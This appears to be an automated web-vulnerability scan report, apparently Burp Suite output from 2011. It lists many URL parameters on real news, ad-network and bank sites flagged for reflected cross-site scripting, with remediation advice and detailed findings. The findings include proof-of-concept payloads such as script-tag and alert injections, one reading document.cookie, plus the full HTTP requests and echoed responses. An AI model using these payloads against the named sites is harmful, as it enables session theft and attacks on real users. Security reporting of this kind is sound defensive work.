http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://ads3.bangkokpost.co.th/www/delivery/spc.php [zones parameter]
http://ads4.bangkokpost.co.th/ads_server/iframe [FONT_COLOR parameter]
http://ads4.bangkokpost.co.th/ads_server/iframe/ [FONT_COLOR parameter]
http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [loc parameter]
http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [name of an arbitrarily supplied request parameter]
http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]
http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]
http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]
http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]
http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]
http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 7]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 7]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 7]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [name of an arbitrarily supplied request parameter]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [name of an arbitrarily supplied request parameter]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 7]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [name of an arbitrarily supplied request parameter]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [name of an arbitrarily supplied request parameter]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 7]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [name of an arbitrarily supplied request parameter]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 7]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 7]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [name of an arbitrarily supplied request parameter]
http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]
http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]
http://advertising.aol.com/nai/nai.php [REST URL parameter 1]
http://advertising.aol.com/nai/nai.php [REST URL parameter 2]
http://advertising.aol.com/nai/nai.php [action_id parameter]
http://advertising.aol.com/token/0/2/1170877546/ [REST URL parameter 1]
http://advertising.aol.com/token/0/3/1885310732/ [REST URL parameter 1]
http://advertising.aol.com/token/1/1/1462706141/ [REST URL parameter 1]
http://advertising.aol.com/token/1/3/1308197307/ [REST URL parameter 1]
http://advertising.aol.com/token/2/2/2011729621/ [REST URL parameter 1]
http://advertising.aol.com/token/2/3/868831419/ [REST URL parameter 1]
http://advertising.aol.com/token/3/2/1144859041/ [REST URL parameter 1]
http://advertising.aol.com/token/3/3/963398391/ [REST URL parameter 1]
http://advertising.aol.com/token/4/1/1214941173/ [REST URL parameter 1]
http://advertising.aol.com/token/4/3/1727096706/ [REST URL parameter 1]
http://advertising.aol.com/token/5/2/2011695027/ [REST URL parameter 1]
http://advertising.aol.com/token/5/3/803328935/ [REST URL parameter 1]
http://advertising.aol.com/token/6/1/737485457/ [REST URL parameter 1]
http://advertising.aol.com/token/6/3/807811660/ [REST URL parameter 1]
http://advertising.aol.com/token/7/1/585611182/ [REST URL parameter 1]
http://advertising.aol.com/token/7/3/1807570122/ [REST URL parameter 1]
http://advertising.aol.com/token/8/1/592246145/ [REST URL parameter 1]
http://advertising.aol.com/token/8/3/1337747048/ [REST URL parameter 1]
http://api.tweetmeme.com/v2/follow.js [REST URL parameter 1]
http://api.tweetmeme.com/v2/follow.js [screen_name parameter]
http://api.tweetmeme.com/v2/follow.js [style parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://bid.openx.net/json [c parameter]
http://cps.regis.edu/lp/computer_degree/it_degree.php [name of an arbitrarily supplied request parameter]
http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [name of an arbitrarily supplied request parameter]
http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [name of an arbitrarily supplied request parameter]
http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [q parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_css_url parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_font_size parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_height parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_width parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgimage parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_description_color parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_podcast parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_title_color parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgcolor parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgimage parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_color parameter]
http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_type parameter]
http://ib.adnxs.com/ab [ccd parameter]
http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]
http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]
http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]
http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 [REST URL parameter 1]
http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 [REST URL parameter 2]
http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 [REST URL parameter 1]
http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 [REST URL parameter 2]
http://msite.martiniadnetwork.com/index/ [REST URL parameter 1]
http://msite.martiniadnetwork.com/index/ [pid parameter]
http://msite.martiniadnetwork.com/index/ [sid parameter]
http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]
http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]
http://nai.adtech.de/nai/daa.php [REST URL parameter 1]
http://nai.adtech.de/nai/daa.php [REST URL parameter 2]
http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]
http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]
http://pixel.adsafeprotected.com/jspix [anId parameter]
http://pixel.adsafeprotected.com/jspix [campId parameter]
http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
http://pixel.adsafeprotected.com/jspix [pubId parameter]
http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]
http://social.ndtv.com/NDTVProfit [name of an arbitrarily supplied request parameter]
http://social.ndtv.com/groups.php [name of an arbitrarily supplied request parameter]
http://social.ndtv.com/home.php [name of an arbitrarily supplied request parameter]
http://social.ndtv.com/static/Comment/Form/ [ctype parameter]
http://social.ndtv.com/static/Comment/Form/ [ctype parameter]
http://social.ndtv.com/static/Comment/Form/ [identifier parameter]
http://social.ndtv.com/static/Comment/Form/ [identifier parameter]
http://social.ndtv.com/static/Comment/Form/ [link parameter]
http://social.ndtv.com/static/Comment/Form/ [link parameter]
http://social.ndtv.com/static/Comment/Form/ [title parameter]
http://social.ndtv.com/static/Comment/Form/ [title parameter]
http://social.ndtv.com/tbModel/comments.php [name of an arbitrarily supplied request parameter]
http://timesofindia.indiatimes.com/topic/Xss [REST URL parameter 2]
http://www.addthis.com/api/nai/optout [REST URL parameter 1]
http://www.addthis.com/api/nai/optout [REST URL parameter 1]
http://www.addthis.com/api/nai/optout [REST URL parameter 2]
http://www.addthis.com/api/nai/optout [REST URL parameter 2]
http://www.addthis.com/api/nai/optout [REST URL parameter 3]
http://www.addthis.com/api/nai/optout [REST URL parameter 3]
http://www.addthis.com/api/nai/status [REST URL parameter 1]
http://www.addthis.com/api/nai/status [REST URL parameter 1]
http://www.addthis.com/api/nai/status [REST URL parameter 2]
http://www.addthis.com/api/nai/status [REST URL parameter 2]
http://www.addthis.com/api/nai/status [REST URL parameter 3]
http://www.addthis.com/api/nai/status [REST URL parameter 3]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
http://www.bangkokpost.com/_event.php [name of an arbitrarily supplied request parameter]
http://www.bangkokpost.com/_event.php [xURI parameter]
http://www.bangkokpost.com/_getContent_main.php [geography parameter]
http://www.bangkokpost.com/_getContent_main.php [name of an arbitrarily supplied request parameter]
http://www.bangkokpost.com/forum/search.php [name of an arbitrarily supplied request parameter]
http://www.bangkokpost.com/forum/viewforum.php [name of an arbitrarily supplied request parameter]
http://www.bangkokpost.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]
http://www.bangkokpost.com/search/news-and-article [REST URL parameter 2]
http://www.bangkokpost.com/search/news-and-article [name of an arbitrarily supplied request parameter]
http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003 [REST URL parameter 2]
http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003 [REST URL parameter 3]
http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003 [REST URL parameter 2]
http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [REST URL parameter 2]
http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [REST URL parameter 3]
http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [REST URL parameter 2]
http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786 [REST URL parameter 3]
http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786 [REST URL parameter 4]
http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797 [REST URL parameter 3]
http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797 [REST URL parameter 4]
http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810 [REST URL parameter 3]
http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810 [REST URL parameter 4]
http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809 [REST URL parameter 3]
http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809 [REST URL parameter 4]
http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]
http://www.scb.co.th/favicon.ico [REST URL parameter 1]
http://www.scb.co.th/scb_api/api_a_deposit.jsp [REST URL parameter 1]
http://www.scb.co.th/scb_api/img/api/t1new/bttn_calc.gif [REST URL parameter 1]
http://www.scb.co.th/scb_api/img/api/t1new/bttn_reset.gif [REST URL parameter 1]
http://www.scb.co.th/scb_api/scbapi.jsp [REST URL parameter 1]
http://www9.effectivemeasure.net/v4/em_js [ns parameter]
http://member.bangkokpost.com/login.php [Referer HTTP header]
http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]
http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]
http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [ZEDOIDA cookie]
http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [ZEDOIDA cookie]
http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js [ruid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

6.1. http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://223.165.24.159
Path:	/toiwidget/jsp/widget.jsp

Issue detail

The value of the city request parameter is copied into the HTML document as plain text between tags. The payload 645c6<script>alert(1)</script>bc6a95ad9f1 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toiwidget/jsp/widget.jsp?city=Mumbai645c6<script>alert(1)</script>bc6a95ad9f1 HTTP/1.1
Host: 223.165.24.159
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:28 GMT
Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 11324

<link href="../css/style.css" rel="stylesheet" type="text/css" /><div class="box"> <h2> <div class="fl" id="cityId"></div> <div class="fr" style="width:85px; text-align:right; mar
...[SNIP]...
<div class="fl">Properties in Mumbai645c6<script>alert(1)</script>bc6a95ad9f1 </div>
...[SNIP]...

6.2. http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://223.165.24.159
Path:	/toiwidget/jsp/widget.jsp

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 953b0'%3balert(1)//e676851dc41 was submitted in the city parameter. This input was echoed as 953b0';alert(1)//e676851dc41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /toiwidget/jsp/widget.jsp?city=Mumbai953b0'%3balert(1)//e676851dc41 HTTP/1.1
Host: 223.165.24.159
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:25 GMT
Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 11223

    <link href="../css/style.css" rel="stylesheet" type="text/css" /><div class="box">    <h2>        <div class="fl" id="cityId"></div>                <div class="fr" style="width:85px; text-align:right; mar
...[SNIP]...
<script type="text/javascript">
var city='Mumbai953b0';alert(1)//e676851dc41';
var originalCity    =    city;
var casechanged    =    city.toLowerCase();
var lengthCount    =    0;
if(casechanged == 'Thiruvananthapuram')
   city    =    'Thiru\'puram';    city = 'Jobs in '+city;
lengthCount    =
...[SNIP]...

6.3. http://ad4.liverail.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ad4.liverail.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e51a9<a>bf5706f66a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?e51a9<a>bf5706f66a9=1 HTTP/1.1
Host: ad4.liverail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
Content-type: text/xml; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 04:06:38 GMT
Server: lighttpd/1.4.28
Content-Length: 181

<?xml version="1.0" encoding="utf-8"?>
<liverail content='error' version='3.0-10.166.49.10'><message>Publisher ID missing (/1//10.166.49.10/e51a9<a>bf5706f66a9)</message></liverail>

6.4. http://addoer.com/showfixads.php [tabname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://addoer.com
Path:	/showfixads.php

Issue detail

The value of the tabname request parameter is copied into a JavaScript rest-of-line comment. The payload dbb87%0aalert(1)//1a736eeaaa3 was submitted in the tabname parameter. This input was echoed as dbb87
alert(1)//1a736eeaaa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /showfixads.php?tabname=c0002761dbb87%0aalert(1)//1a736eeaaa3&frame=yes HTTP/1.1
Host: addoer.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 02:25:16 GMT
Server: Sun Java System
Content-Length: 135

get domain from : http://paidoo.net/get_dom.php?tabname=c0002761dbb87
alert(1)//1a736eeaaa3&code=d835fd240569ce2847976e38e40e427d<br />

6.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee597"-alert(1)-"d76410964e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

